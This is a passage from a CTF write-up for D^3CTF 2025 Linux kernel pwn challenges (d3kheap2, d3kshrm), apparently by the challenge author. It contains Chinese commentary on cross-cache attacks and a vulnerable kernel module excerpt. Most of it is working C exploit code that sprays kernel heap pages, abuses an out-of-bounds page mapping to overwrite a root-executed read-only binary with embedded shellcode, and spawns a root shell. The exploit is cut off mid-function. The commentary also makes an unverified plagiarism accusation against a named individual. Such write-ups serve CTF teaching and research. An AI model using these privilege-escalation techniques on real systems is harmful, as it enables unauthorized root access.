                page_offset_base -= KASLR_GRANULARITY;
                puts("[?] Looping!?");
            }

            break;
        }
    }

    puts("[*] Overwriting cred and granting root privilege...");

    cred_data->uid = 0;
    cred_data->gid = 0;

    arbitrary_write_by_pipe(
        cred_kpage_addr,
        cred_data_buf,
        0xff0,
        atk_msgq,
        msg_buf,
        MSG_SPRAY_SZ,
        MSG_TAG_BASE
    );

    setresuid(0, 0, 0);
    setresgid(0, 0, 0);

    get_root_shell();

    system("/bin/sh");
}

void banner(void)
{
    puts(SUCCESS_MSG("-------- D^3CTF2025::Pwn - d3kheap2 --------") "\n"
    INFO_MSG("--------    Official Exploitation   --------\n")
    INFO_MSG("--------      Author: ")"arttnba3"INFO_MSG("      --------") "\n"
    SUCCESS_MSG("-------- Local Privilege Escalation --------\n"));
}

int main(int argc, char **argv, char **envp)
{
    banner();
    exploit();
    return 0;
}

What’s more…

题目的介绍是由笔者曾经最喜欢的一首名为 7years 的歌的歌词修改而来（虽然当时笔者是 15 years old），因为这常让我回忆起曾经的少年时期，而笔者希望这也能让大家想起自从 D^3CTF 2022 的 d3kheap 以来 Linux kernel exploitation 的发展的步子所迈之大（ ~~虽然这两件事好像没什么关联~~ ），有了惊艳的 cross-cache attack 我们近乎能够通过将 SLUB page 从一个 kmem_cache 迁移到另一个的方式来利用所有的 UAF 与 DF 漏洞，这也是为什么我将这道题目命名为 d3kheap2 的缘故： Solution upgration from limited one for d3kheap’s easy double free to general one for d3kheap2’s lunatic double free

尽管这道题目的核心技术在 2025 年并不是一个非常新的事物（甚至在 2022 年就已经有人提出，虽然笔者不知道这是不是最早的），但在过去几年的 CTF 当中 cross-cache attack 并不常见，这也是为什么我选择在今年的 D^3CTF 当中展示这个技术，因为在 2024 年我比较忙，而在 2023 年我又展示了一些别的东西（在一年后被一个名为胡嘉懿的参加过 D^3CTF 2023 的学生抄袭并 偷去发了 BlackHat USA 2024 ，敢在 BlackHat 上直接展示一个和👴博客几乎一模一样的东西确实还真是 挺不要脸的 ）

另一个我选择 cross-cache attack 的原因是 我确实没有太多时间来完成这些题目 ，由于我已经从本科毕业了，我并没有太关注于我的后辈们今年准备 D^3CTF 的情况，直到 比赛开始的大概 10 天前 才知道今年几乎还没有 pwn 题，因此我不得不在脑子里几乎没有什么新的研究成果的情况下冲刺准备今年的 Pwn 题以确保比赛能像往年一样正常举办， 非常抱歉今年笔者未能带来和 2023 年的 d3kcache 一样炫酷的玩意 ，但幸运的是我仍然给你们准备了一些特殊的礼物，那就是我玩弄 msg_msg 与 pipe_buffer 的小技巧： tricky but useful gadgets you may be love in

以及如果你足够细心你或许会发现这道题没有像 d3kshrm 那样开启 CONFIG_SLAB_BUCKETS 配置（一种对抗堆喷的缓解措施），虽然通过全量堆喷来代替精确对象分配以绕过并不难，但考虑到今年的 D^3CTF 只有 24h，我还是希望这道题能够让选手们在 “Pwn” 这一分类比较简单地能签上到，就像 D^3CTF 2022 的 d3kheap 的介绍一样，因此这道题在最初设计时并不是一道非常难题目

对于最后的解题结果，绝大部分选手都使用了预期的 cross-cache attack，笔者非常开心能够看到参与比赛的 CTFer 们大都已经掌握了这项能够在近乎任意堆漏洞上进行利用的高级技术，而随着 cross-cache attack 在近年已经被广泛使用，我确信这将、或已经成为了如今 Linux kernel exploitation 的基础步骤或是标准入口；非常遗憾的是我忘了开启 CONFIG_MEMCG 以分开 GFP_KERNEL 和 GFP_KERNEL_ACCOUNT 对象，你们可以看到我使用了非常复杂的多阶段利用技术操纵 msg_msg 与 pipe_buffer ，但有的选手就可以直接用 sk_buff 来读写 UAF 的 pipe_buffer ；另一个遗憾的是取得一血的 We_0wn_y0u 战队在 D^3CTF 2025 当中仅做了 d3kheap2 这一道题目就走了，因此我并不知道他们的具体解法

现在让我们来看看那些 最先进的学术技术 如 Dirty PageTable（ SLUBStick ，我不知道为什么有两个名字，我也不确定他们的作者是否相同 ，因为 Dirty Pagetable 的原博客似乎被移除了，我暂时也没有足够的时间去做区分）与 DirtyPage （作者也叫他 Page Spray）， 其基础技术都是 cross-cache attack ：他们是否强大到足以应用在这道题目上？结果似乎是 没那么容易 ，因为他们都是为不同的漏洞范式而设计的

对于 SLUBStick 而言，我们需要额外的几次进行 UAF 写 的权能，这会需要我们构造复杂的多阶段的 cross-cache 页释放与重取回，在提升了构造利用的难度的同时也降低了可用性与稳定性
DirtyPage 说其通过迷惑在一个 SLUB 上的对象计数（参见 Figure 1: Page Spray Exploit Model for Double Free. ）“走了更远的一步” ，但覆写一个没有任何功能的对象是 毫无意义的 ，在笔者看来这或许更适用于攻击有着特定功能的内核对象（例如 file 或是 pipe_buffer ？），但若是目标对象缺少为后续攻击阶段的足够的供能，这样的利用或许无法被应用

因此， 纯粹的 cross-cache attack 在我看来更适用于 d3kheap2 ，但无论如何感谢他们开发了如此强大的利用技术并拓宽了我们的视野到另一个层面

另一个点便是如同 Pspray 这样的通过计时侧信道攻击来预测分配 SLUB 页面的辅助技术对于不局限于 d3kheap2 的通用内核堆利用而言似乎没有太多作用，一个核心的原因便是随着像 CONFIG_RANDOM_KMALLOC_CACHES 这样的缓解措施的出现在内核主线使得一个新的 SLUB page 是否被分配对于我们而言不再那么重要，因为我们的对象总会从不同的独立的池中随机分配，进行大量的堆喷并进行近似估计似乎是唯一的可行方法，尽管在 d3kheap2 没有开启这一缓解措施，笔者仍然想讲一讲与真实世界利用有关的东西，希望大家不要介意：）

尽管关于 Linux kernel exploitation 笔者还有很多想说的话，但似乎写到这里的时候文章已经太长了，那么就让我们就此打住吧，无论如何我要感谢每一位参加了这个 CTF 并尝试进行解题的选手，无论你们是否获得了 flag

0x02. D3KSHRM | 1 Solve

You know what? Sharing is always a good moral quality. That’s the reason why I’m going to share some of my precious memories with all of you!

Copyright(c) 2025 <ディーキューブ・シーティーエフカーネル Pwn 製作委員会>

Author: arttnba3 @ L-team x El3ctronic x D^3CTF

You can get the original attachment at https://github.com/arttnba3/D3CTF2025_d3kshrm.

Introduction

这道题目提供了一个名为 d3kshrm.ko 的内核模块，其为用户提供了创建共享内存的功能，通过 ioctl() 我们有着如下权能：

创建一个特定大小的新的共享内存
绑定到一个现有的共享内存上
与当前共享内存解绑
删除一个现有的共享内存

而要访问这块内存，我们可以在绑定之后去 mmap() 对应的文件描述符，而这也是漏洞所在的地方，由于缺乏对 d3kshrm::pages 的恰当的范围检查，攻击者可以将 d3kshrm::pages 的相邻的 8 字节作为一个 struct page 指针并映射到用户地址空间中：

static vm_fault_t d3kshrm_vm_fault(struct vm_fault *vmf)
{
    struct d3kshrm_struct *d3kshrm;
    struct vm_area_struct *vma;
    vm_fault_t res;

    vma = vmf->vma;
    d3kshrm = (struct d3kshrm_struct *) vma->vm_private_data;

    spin_lock(&d3kshrm->lock);

    /* vulnerability here */
    // if (vmf->pgoff >= d3kshrm->page_nr) {
    if (vmf->pgoff > d3kshrm->page_nr) {
        res = VM_FAULT_SIGBUS;
        goto ret;
    }

    get_page(d3kshrm->pages[vmf->pgoff]);
    vmf->page = d3kshrm->pages[vmf->pgoff];
    res = 0;

ret:
    spin_unlock(&d3kshrm->lock);

    return res;
}

Exploitation

由于 d3kshrm::pages 会从独立的 kmem_cache 中进行分配，我们必须使用页级堆风，水技术来操纵页级内存以尝试去映射题目功能以外的页指针，因为由于引用计数的存在我们无法通过直接映射一个页面两次的方式来直接进行页级的双重释放，因此我们可用的利用策略是将原本只有只读权限的页面映射到用户空间，这不禁让我们想起 CVE-2023-2008 ，其同样也是利用了越界页映射来完成类似 Dirty Pipe 的攻击，因此下面是我们的利用策略：

使用页级堆风水技术重排布页级内存以让题目的独立 kmem_cache 的 SLUB page 被放到目标对象的两张 SLUB page 中间，这里我们选择 pipe_buffer 作为我们的目标对象，因为其结构体开头有一个 struct page 指针，这让我们能够进行 oob mapping
打开一个只读文件并使用 spice() 系统调用来将其第一个页面放到 pipe_buffer 当中
利用漏洞来进行 oob mapping 以将只有只读权限的页以可读写权限映射到用户空间当中，由此我们便能修改只读文件

我最终选择 /sbin/poweroff （其链接到 busybox 上）作为我们的目标文件，因为 /etc/init.d/rcS 的最后一行是以 root 权限执行 /sbin/poweroff ，这让我们能够以 root 权限执行任意代码，最终的利用程序如下，有着将近 84.63% 的成功率（在经过超过 2048 次的本地自动测试得出的结果），且我确信还有能将其优化到 95%+ 的空间，因为我并没有采用更加复杂的高级页风水技巧：

/**
 * Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
 * 
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <sched.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/socket.h>

/**
 * Kernel Pwn Infrastructures
**/

#define SUCCESS_MSG(msg)    "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg)       "\033[34m\033[1m" msg "\033[0m"
#define ERROR_MSG(msg)      "\033[31m\033[1m" msg "\033[0m"

#define log_success(msg)    puts(SUCCESS_MSG(msg))
#define log_info(msg)       puts(INFO_MSG(msg))
#define log_error(msg)      puts(ERROR_MSG(msg))

void err_exit(char *msg)
{
    printf(ERROR_MSG("[x] Error at: ") "%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf(SUCCESS_MSG("[*] Process binded to core ") "%d\n", core);
}

void get_root_shell(void)
{
    if(getuid()) {
        log_error("[x] Failed to get the root!");
        sleep(5);
        exit(EXIT_FAILURE);
    }

    log_success("[+] Successful to get the root.");
    log_info("[*] Execve root shell now...");

    system("/bin/sh");

    /* to exit the process normally, instead of potential segmentation fault */
    exit(EXIT_SUCCESS);
}

int get_msg_queue(void)
{
    return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/**
 * the msgp should be a pointer to the `struct msgbuf`,
 * and the data should be stored in msgbuf.mtext
 */
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    ((struct msgbuf*)msgp)->mtype = msgtyp;
    return msgsnd(msqid, msgp, msgsz, 0);
}

#ifndef MSG_COPY
    #define MSG_COPY 040000
#endif

/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz, msgtyp, 
                  MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

int unshare_setup(void)
{
    char edit[0x100];
    int tmp_fd;

    if (unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        log_error("[x] Unable to create new namespace for PGV subsystem");
        return -EPERM;
    }

    tmp_fd = open("/proc/self/setgroups", O_WRONLY);
    write(tmp_fd, "deny", strlen("deny"));
    close(tmp_fd);

    tmp_fd = open("/proc/self/uid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getuid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);

    tmp_fd = open("/proc/self/gid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getgid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);

    return 0;
}

/**
 * pgv pages sprayer related 
 * not that we should create two process:
 * - the parent is the one to send cmd and get root
 * - the child creates an isolate userspace by calling unshare_setup(),
 *      receiving cmd from parent and operates it only
**/

#define PGV_SOCKET_MAX_NR 1024
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

struct tpacket_req {
    unsigned int tp_block_size;
    unsigned int tp_block_nr;
    unsigned int tp_frame_size;
    unsigned int tp_frame_nr;
};

struct pgv_page_request {
    int idx;
    int cmd;
    unsigned int size;
    unsigned int nr;
};

enum {
    PGV_CMD_ALLOC_SOCKET,
    PGV_CMD_ALLOC_PAGE,
    PGV_CMD_FREE_PAGE,
    PGV_CMD_FREE_SOCKET,
    PGV_CMD_EXIT,
};

enum tpacket_versions {
    TPACKET_V1,
    TPACKET_V2,
    TPACKET_V3,
};

int cmd_pipe_req[2], cmd_pipe_reply[2];

int create_packet_socket()
{
    int socket_fd;
    int ret;

    socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (socket_fd < 0) {
        log_error("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)");
        ret = socket_fd;
        goto err_out;
    }

    return socket_fd;

err_out:
    return ret;
}

int alloc_socket_pages(int socket_fd, unsigned int size, unsigned nr)
{
    struct tpacket_req req;
    int version, ret;

    version = TPACKET_V1;
    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, 
                     &version, sizeof(version));
    if (ret < 0) {
        log_error("[x] failed at setsockopt(PACKET_VERSION)");
        goto err_setsockopt;
    }

    memset(&req, 0, sizeof(req));
    req.tp_block_size = size;
    req.tp_block_nr = nr;
    req.tp_frame_size = 0x1000;
    req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
    if (ret < 0) {
        log_error("[x] failed at setsockopt(PACKET_TX_RING)");
        goto err_setsockopt;
    }

    return 0;

err_setsockopt:
    return ret;
}

int free_socket_pages(int socket_fd)
{
    struct tpacket_req req;
    int ret;
    
    memset(&req, 0, sizeof(req));
    req.tp_block_size = 0x3361626e;
    req.tp_block_nr = 0;
    req.tp_frame_size = 0x74747261;
    req.tp_frame_nr = 0;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
    if (ret < 0) {
        log_error("[x] failed at setsockopt(PACKET_TX_RING)");
        goto err_setsockopt;
    }

    return 0;

err_setsockopt:
    return ret;
}

void spray_cmd_handler(void)
{
    struct pgv_page_request req;
    int socket_fd[PGV_SOCKET_MAX_NR];
    int ret;

    /* create an isolate namespace*/
    if (unshare_setup()) {
        err_exit("FAILED to initialize PGV subsystem for page spraying!");
    }

    memset(socket_fd, 0, sizeof(socket_fd));

    /* handler request */
    do {
        read(cmd_pipe_req[0], &req, sizeof(req));

        switch (req.cmd) {
        case PGV_CMD_ALLOC_SOCKET:
            if (socket_fd[req.idx] != 0) {
                printf(ERROR_MSG("[x] Duplicate idx request: ") "%d\n",req.idx);
                ret = -EINVAL;
                break;
            }

            ret = create_packet_socket();
            if (ret < 0) {
                perror(ERROR_MSG("[x] Failed at allocating packet socket"));
                break;
            }

            socket_fd[req.idx] = ret;
            ret = 0;

            break;
        case PGV_CMD_ALLOC_PAGE:
            if (socket_fd[req.idx] == 0) {
                printf(ERROR_MSG("[x] No socket fd for idx: ") "%d\n",req.idx);
                ret = -EINVAL;
                break;
            }

            ret = alloc_socket_pages(socket_fd[req.idx], req.size, req.nr);
            if (ret < 0) {
                perror(ERROR_MSG("[x] Failed to alloc packet socket pages"));
                break;
            }

            break;
        case PGV_CMD_FREE_PAGE:
            if (socket_fd[req.idx] == 0) {
                printf(ERROR_MSG("[x] No socket fd for idx: ") "%d\n",req.idx);
                ret = -EINVAL;
                break;
            }

            ret = free_socket_pages(socket_fd[req.idx]);
            if (ret < 0) {
                perror(ERROR_MSG("[x] Failed to free packet socket pages"));
                break;
            }

            break;
        case PGV_CMD_FREE_SOCKET:
            if (socket_fd[req.idx] == 0) {
                printf(ERROR_MSG("[x] No socket fd for idx: ") "%d\n",req.idx);
                ret = -EINVAL;
                break;
            }

            close(socket_fd[req.idx]);

            break;
        case PGV_CMD_EXIT:
            log_info("[*] PGV child exiting...");
            ret = 0;
            break;
        default:
            printf(
                ERROR_MSG("[x] PGV child got unknown command : ")"%d\n",
                req.cmd
            );
            ret = -EINVAL;
            break;
        }

        write(cmd_pipe_reply[1], &ret, sizeof(ret));
    } while (req.cmd != PGV_CMD_EXIT);
}

void prepare_pgv_system(void)
{
    /* pipe for pgv */
    pipe(cmd_pipe_req);
    pipe(cmd_pipe_reply);
    
    /* child process for pages spray */
    if (!fork()) {
        spray_cmd_handler();
    }
}

int create_pgv_socket(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = PGV_CMD_ALLOC_SOCKET,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

int destroy_pgv_socket(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = PGV_CMD_FREE_SOCKET,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

int alloc_page(int idx, unsigned int size, unsigned int nr)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = PGV_CMD_ALLOC_PAGE,
        .size = size,
        .nr = nr,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

int free_page(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = PGV_CMD_FREE_PAGE,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(req));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    usleep(10000);

    return ret;
}

/**
 * Challenge Interface
**/

#define CMD_CREATE_D3KSHRM    0x3361626e
#define CMD_DELETE_D3KSHRM    0x74747261
#define CMD_SELECT_D3KSHRM    0x746e6162
#define CMD_UNBIND_D3KSHRM    0x33746172

#define MAX_PAGE_NR 0x100

int chal_fd;

int d3kshrm_create(int fd, unsigned long page_nr)
{
    return ioctl(fd, CMD_CREATE_D3KSHRM, page_nr);
}

int d3kshrm_delete(int fd, unsigned long idx)
{
    return ioctl(fd, CMD_DELETE_D3KSHRM, idx);
}

int d3kshrm_select(int fd, unsigned long idx)
{
    return ioctl(fd, CMD_SELECT_D3KSHRM, idx);
}

int d3kshrm_unbind(int fd)
{
    return ioctl(fd, CMD_UNBIND_D3KSHRM);
}

/**
 * Exploitation procedure
**/

#define PIPE_SPRAY_NR 126

int prepare_pipe(int pipe_fd[PIPE_SPRAY_NR][2])
{
    int err;

    for (int i = 0; i < PIPE_SPRAY_NR; i++) {
        if ((err = pipe(pipe_fd[i])) < 0) {
            printf(
                ERROR_MSG("[x] failed to alloc ")"%d"ERROR_MSG(" pipe!\n"), i
            );
            return err;
        }
    }

    return 0;
}

int expand_pipe(int pipe_fd[PIPE_SPRAY_NR][2], size_t size)
{
    int err;

    for (int i = 0; i < PIPE_SPRAY_NR; i++) {
        if ((err = fcntl(pipe_fd[i][1], F_SETPIPE_SZ, size)) < 0) {
            printf(
                ERROR_MSG("[x] failed to expand ")"%d"ERROR_MSG(" pipe!\n"), i
            );
            return err;
        }
    }

    return 0;
}

ssize_t splice_pipe(int pipe_fd[PIPE_SPRAY_NR][2], int victim_fd)
{
    ssize_t err;
    loff_t offset;

    for (int i = 0; i < PIPE_SPRAY_NR; i++) {
        offset = 0;
        if ((err = splice(victim_fd,&offset,pipe_fd[i][1],NULL,0x1000,0)) < 0) {
            printf(
                ERROR_MSG("[x] failed to splice ")"%d"ERROR_MSG(" pipe!\n"),i
            );
            return err;
        }
    }

    return 0;
}

#define PBF_SZ_PAGE_NR (0x1000 / 8)

uint8_t shellcode[] = {
    /* ELF header */

    // e_ident[16]
    0x7f, 0x45, 0x4c, 0x46, /* Magic number "\x7fELF" */
    0x02,   /* ELF type: 64-bit */
    0x01,   /* ELF encode: LSB */
    0x01,   /* ELF version: current */
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,   /* Reserve */
    // e_type: ET_EXEC
    0x02, 0x00,
    // e_machine: AMD x86-64
    0x3e, 0x00,
    // e_version: 1
    0x01, 0x00, 0x00, 0x00,
    // e_entry: 0x0000000000400078
    0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
    // e_phoff: 0x40
    0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    // e_shoff: 0
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    // e_flags: 0
    0x00, 0x00, 0x00, 0x00,
    // e_ehsize: 0x40
    0x40, 0x00,
    // e_phentsize: 0x38
    0x38, 0x00,
    // e_phnum: 1
    0x01, 0x00,
    // e_shentsize: 0
    0x00, 0x00,
    // e_shnum: 0
    0x00, 0x00,
    // e_shstrndx: 0
    0x00, 0x00,

    /* Program Header Table[0] */

    // p_type: PT_LOAD
    0x01, 0x00, 0x00, 0x00,
    // p_flags: PF_R | PF_W | PF_X
    0x07, 0x00, 0x00, 0x00,
    // p_offset: 0
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    // p_vaddr: 0x0000000000400000
    0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
    // p_paddr: 0x0000000000400000
    0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
    // p_filesz: 0xD5
    0xD5, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    // p_memsz: 0xF2
    0xF2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    // p_align: 0x1000
    0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

    /* Sections[0]: Shellcode */

    // opening "/flag" and read

    // xor rax, rax
    0x48, 0x31, 0xc0,
    // push rax
    0x50,
    // movabs rax, 0x67616c662f # "/flag"
    0x48, 0xb8, 0x2f, 0x66, 0x6c, 0x61, 0x67, 0x00, 0x00, 0x00,
    // push rax
    0x50,
    // mov rax, 0x02
    0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00,
    // mov rdi, rsp
    0x48, 0x89, 0xe7,
    // xor rsi, rsi
    0x48, 0x31, 0xf6,
    // syscall
    0x0f, 0x05,
    // mov rdi, rax
    0x48, 0x89, 0xc7,
    // xor rax, rax
    0x48, 0x31, 0xc0,
    // sub, rsp, 0x100
    0x48, 0x81, 0xec, 0x00, 0x01, 0x00, 0x00,
    // mov rsi, rsp
    0x48, 0x89, 0xe6,
    // mov rdi, 0x100
    0x48, 0xc7, 0xc2, 0x00, 0x01, 0x00, 0x00,
    // syscall
    0x0f, 0x05,
    // mox rax, 0x1
    0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00,
    // mox rdi, 0x1
    0x48, 0xc7, 0xc7, 0x01, 0x00, 0x00, 0x00,
    // mox rsi, rsp
    0x48, 0x89, 0xe6,
    // mox rdx, 0x100
    0x48, 0xc7, 0xc2, 0x00, 0x01, 0x00, 0x00,
    // syscall
    0x0f, 0x05,
    // xor rdi, rdi
    0x48, 0x31, 0xff,
    // mov rax, 0x3c
    0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00,
    // syscall
    0x0f, 0x05,
};

#define PAGE8_SPRAY_NR 0x100

int prepare_pgv_pages(void)
{
    int errno;

    for (int i = 0; i < PAGE8_SPRAY_NR; i++) {
        if ((errno = create_pgv_socket(i)) < 0) {
            printf(ERROR_MSG("[x] Failed to allocate socket: ") "%d\n", i);
            return errno;
        }

        if ((errno = alloc_page(i, 0x1000 * 8, 1)) < 0) {
            printf(ERROR_MSG("[x] Failed to alloc pages on socket: ")"%d\n", i);
            return errno;
        }
    }

    return 0;
}

#define MSG_QUEUE_NR 0x100
#define MSG_SPRAY_NR 2

int prepare_msg_queue(int msqid[MSG_QUEUE_NR])
{
    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        if ((msqid[i] = get_msg_queue()) < 0) {
            printf(
                ERROR_MSG("[x] Unable to create ")"%d"ERROR_MSG(" msg_queue\n"),
                i
            );
            return msqid[i];
        }
    }

    return 0;
}

int spray_msg_msg(int msqid[MSG_QUEUE_NR])
{
    char buf[0x2000];
    int err;

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        for (int j = 0; j < MSG_SPRAY_NR; j++) {
            if ((err = write_msg(msqid[i],buf,0xF00,0x3361626e74747261+i)) < 0){
                return err;
            }
        }
    }

    return 0;
}

#define D3KSHRM_SLUB_OBJ_NR 8
#define D3KSHRM_SPRAY_NR (D3KSHRM_SLUB_OBJ_NR * 2)

void exploit(void)
{
    int pipe_fd1[PIPE_SPRAY_NR][2], pipe_fd2[PIPE_SPRAY_NR][2];
    int msqid[MSG_QUEUE_NR];
    int d3kshrm_fd[D3KSHRM_SPRAY_NR], d3kshrm_idx[D3KSHRM_SPRAY_NR];
    int victim_fd;
    char *oob_buf[D3KSHRM_SPRAY_NR];
    void *victim_buf;

    log_info("[*] Preparing...");

    bind_core(0);
    prepare_pgv_system();

    victim_fd = open("/sbin/poweroff", O_RDONLY);
    if (victim_fd < 0) {
        perror("Failed to open target victim file");
        exit(EXIT_FAILURE);
    }

    log_info("[*] Allocating msg_queue for clearing kmem_cache...");
    if (prepare_msg_queue(msqid) < 0) {
        err_exit("FAILED to create msg_queue!");
    }

    log_info("[*] Allocating pipe_fd1 group...");
    if (prepare_pipe(pipe_fd1) < 0) {
        perror(ERROR_MSG("Failed to spray pipe_buffer"));
        err_exit("FAILED to prepare first part of pipes.\n");
    }

    log_info("[*] Allocating pipe_fd2 group...");
    if (prepare_pipe(pipe_fd2) < 0) {
        perror(ERROR_MSG("Failed to spray pipe_buffer"));
        err_exit("FAILED to prepare second part of pipes.\n");
    }

    log_info("[*] Preparing D3KSHRM files...");
    for (int i = 0; i < D3KSHRM_SPRAY_NR; i++) {
        if ((d3kshrm_fd[i] = open("/proc/d3kshrm", O_RDWR)) < 0) {
            perror(ERROR_MSG("Failed to open /proc/d3kshrm"));
            err_exit("FAILED to spray D3KSHRM files.\n");
        }
    }

    log_info("[*] Pre-allocating ONE SLUB pages for D3kSHRM...");
    if ((d3kshrm_idx[0] = d3kshrm_create(d3kshrm_fd[0], PBF_SZ_PAGE_NR)) < 0) {
        perror(ERROR_MSG("Failed to create D3KSHRM shared memory"));
        err_exit("FAILED to spray D3KSHRM shared memory.\n");
    }

    log_info("[*] Allocating pgv pages...");
    if (prepare_pgv_pages() < 0) {
        err_exit("FAILED to prepare pages on packet socket.\n");
    }

    log_info("[*] Clear previous redundant memory storage in kernel...");
    if (spray_msg_msg(msqid) < 0) {
        perror(ERROR_MSG("Failed to spray msg_msg"));
        err_exit("FAILED to clear reduncant kernel memory storage.\n");
    }

    log_info("[*] Spraying D3KSHRM buffer...");

    free_page((PAGE8_SPRAY_NR / 2) + 1);
    destroy_pgv_socket((PAGE8_SPRAY_NR / 2) + 1);

    for (int i = 1; i < D3KSHRM_SPRAY_NR; i++) {
        if ((d3kshrm_idx[i] = d3kshrm_create(d3kshrm_fd[i], PBF_SZ_PAGE_NR))<0){
            perror(ERROR_MSG("Failed to create D3KSHRM shared memory"));
            err_exit("FAILED to spray D3KSHRM shared memory.\n");
        }
    }

    log_info("[*] Expanding pipe_buffer...");

    free_page(PAGE8_SPRAY_NR / 2);
    destroy_pgv_socket(PAGE8_SPRAY_NR / 2);

    if (expand_pipe(pipe_fd1, 0x1000 * 64) < 0) {
        perror(ERROR_MSG("Failed to expand pipe_buffer"));
        err_exit("FAILED to expand first part of pipes.\n");
    }

    log_info("[*] Expanding pipe_buffer...");

    free_page((PAGE8_SPRAY_NR / 2) + 2);
    destroy_pgv_socket((PAGE8_SPRAY_NR / 2) + 2);

    if (expand_pipe(pipe_fd2, 0x1000 * 64) < 0) {
        perror(ERROR_MSG("Failed to expand pipe_buffer"));
        err_exit("FAILED to expand second part of pipes.\n");
    }

    log_info("[*] Splicing victim file into pipe group...");

    if (splice_pipe(pipe_fd1, victim_fd) < 0) {
        perror(ERROR_MSG("Failed to splice target fd"));
        err_exit("FAILED to splice victim file into pipe_fd1 group.\n");
    }

    if (splice_pipe(pipe_fd2, victim_fd) < 0) {
        perror(ERROR_MSG("Failed to splice target fd"));
        err_exit("FAILED to splice victim file into pipe_fd2 group.\n");
    }

    log_info("[*] Doing mmap and mremap...");

    for (int i = D3KSHRM_SLUB_OBJ_NR; i < D3KSHRM_SPRAY_NR; i++) {
        if (d3kshrm_select(d3kshrm_fd[i], d3kshrm_idx[i]) < 0) {
            perror(ERROR_MSG("Failed to select D3KSHRM shared memory"));
            err_exit("FAILED to select D3KSHRM shared memory.\n");
        }

        oob_buf[i] = mmap(
            NULL,
            0x1000 * PBF_SZ_PAGE_NR,
            PROT_READ | PROT_WRITE,
            MAP_FILE | MAP_SHARED,
            d3kshrm_fd[i],
            0
        );
        if (oob_buf[i] == MAP_FAILED) {
            perror(ERROR_MSG("Failed to map chal_fd"));
            err_exit("FAILED to mmap chal_fd.\n");
        }

        oob_buf[i] = mremap(
            oob_buf[i],
            0x1000 * PBF_SZ_PAGE_NR,
            0x1000 * (PBF_SZ_PAGE_NR + 1),
            MREMAP_MAYMOVE
        );
        if (oob_buf[i] == MAP_FAILED) {
            perror(ERROR_MSG("Failed to mremap oob_buf area"));
            err_exit("FAILED to mremap chal's mmap area.\n");
        }
    }

    log_info("[*] Checking for oob mapping...");

    victim_buf = NULL;
    for (int i = D3KSHRM_SLUB_OBJ_NR; i < D3KSHRM_SPRAY_NR; i++) {
        /* Examine ELF header to see whether we hit the busybox */
        if (*(size_t*) &oob_buf[i][0x1000*PBF_SZ_PAGE_NR] == 0x3010102464c457f){
            victim_buf = (void*) &oob_buf[i][0x1000*PBF_SZ_PAGE_NR];
            break;
        }
    }

    if (!victim_buf) {
        err_exit("FAILED to oob mmap pages in pipe!");
    }

